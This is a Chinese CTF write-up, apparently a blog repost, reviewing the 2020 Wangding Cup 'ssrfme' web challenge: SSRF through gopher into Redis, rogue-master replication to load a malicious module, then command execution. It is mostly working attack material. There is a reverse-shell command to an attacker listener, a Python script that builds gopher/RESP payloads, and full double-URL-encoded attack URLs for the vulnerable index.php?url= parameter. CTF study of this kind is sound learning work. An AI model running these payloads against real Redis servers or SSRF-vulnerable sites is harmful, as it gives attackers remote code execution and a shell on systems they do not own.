其他分享
首页 > 其他分享> > CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾

CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾

作者:互联网

CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾

思路:SSRF结合redis主从复制RCE

Tip:使用DNS重绑定绕过限制

参考笔记:redis

主服务器:192.168.8.103

从服务器:192.168.8.104,redis 5.0.8(bind 0.0.0.0,关闭安全模式),centos 7(关闭防火墙)

第一步:使用脚本redis-rogue-server伪装redis主服务器:

python3 redis-rogue-server.py --server-only

第二步:在自控服务器用nc监听端口4607

第三步:攻击

首先确认在redis上要执行的命令:

config set dir /tmp/
config set dbfilename exp.so
slaveof 192.168.8.103 21000
module load /tmp/exp.so
system.exec 'bash -i >& /dev/tcp/192.168.8.103/4607 0>&1'

其次用redis_rdsp_z.py脚本转换一下命令:

python redis_resp_z.py

redis_rdsp_z.py:

#!/usr/bin/env python
# -*-coding:utf-8-*-

import urllib
ip="192.168.8.104"
port="6379"
#有密码时加上下面的auth值
payload="gopher://"+ip+":"+port+"/_%2A2%0d%0a%244%0d%0aAUTH%0d%0a%247%0d%0a123.com%0D%0A"
#没密码时用下面的
#payload="gopher://"+ip+":"+port+"/_"
#命令的值中有空格就暂时先替换成${IFS},便于后面处理,如set 1 <qw er>写成set 1 <qw${IFS}er>。
cmd=[
     "config set dir /tmp/",
     "config set dbfilename exp.so",
     "slaveof 192.168.8.103 21000",
     "module load /tmp/exp.so",
     "system.exec bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.8.103/4607${IFS}0>&1",
     "quit"
     ]


'''
     "config set dir /tmp/",
     "config set dbfilename exp.so",
     "slaveof 192.168.8.103 21000",
     "quit"
'''


'''
     "module load /tmp/exp.so",
     "system.exec bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.8.103/4607${IFS}0>&1",
     "quit"
'''
def tran_rdsp(x):
        #这是前面空格暂时先替换成${IFS}的原因。
        x_split = x.split(" ")
        #加*,因为RDSP协议中,对于array,回复的第一个字节是*。
        cmd=""
        cmd+="*"+str(len(x_split))
        #加$,因为RDSP协议中,对于Bulk Strings,回复的第一个字节是$,顺便再把${IFS}换回空格。
        for i in x_split:
            cmd+="\r\n"+"$"+str(len((i.replace("${IFS}"," "))))+"\r\n"+i.replace("${IFS}"," ")
        cmd+="\r\n"
        return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(tran_rdsp(x))
    print payload

其三,将转换后的命令再URL编码一次:

gopher%3A%2F%2F192.168.8.104%3A6379%2F_%252A2%250d%250a%25244%250d%250aAUTH%250d%250a%25247%250d%250a123.com%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25247%250D%250Aslaveof%250D%250A%252413%250D%250A192.168.8.103%250D%250A%25245%250D%250A21000%250D%250A%252A3%250D%250A%25246%250D%250Amodule%250D%250A%25244%250D%250Aload%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252443%250D%250Abash%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.8.103%2F4607%25200%253E%25261%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

其四:攻击

第一种方式

#执行一次后,等几秒再执行一次,监听端即可收到shell。

#原因是:这里将所有命令一次性发过去,第一次执行时模块未加载完,反弹shell的命令执行失败。第二次执行时模块已加载,反弹shell的命令执行成功。

http://192.168.8.104:8080/index.php?url=gopher%3A%2F%2F192.168.8.104%3A6379%2F_%252A2%250d%250a%25244%250d%250aAUTH%250d%250a%25247%250d%250a123.com%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25247%250D%250Aslaveof%250D%250A%252413%250D%250A192.168.8.103%250D%250A%25245%250D%250A21000%250D%250A%252A3%250D%250A%25246%250D%250Amodule%250D%250A%25244%250D%250Aload%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252443%250D%250Abash%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.8.103%2F4607%25200%253E%25261%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

第二种方式

空格都用%2520替换,换行都用%250d%250a替换。依次执行下面三句即可执行命令:

http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit

http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.8.103%252021000%250d%250aquit

http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250amodule%2520load%2520/tmp/exp.so%250d%250asystem.exec%2520id%250d%250aquit

#第三句中,system.exec id等可以执行,system.exec bash -i >& /dev/tcp/192.168.8.103/4607 0>&1执行失败;且system.rev报错无命令。

标签:web,ssrfme,IFS,redis,250d%,192.168,250D%,CTF,250A%
来源: https://blog.csdn.net/weixin_40422959/article/details/106463823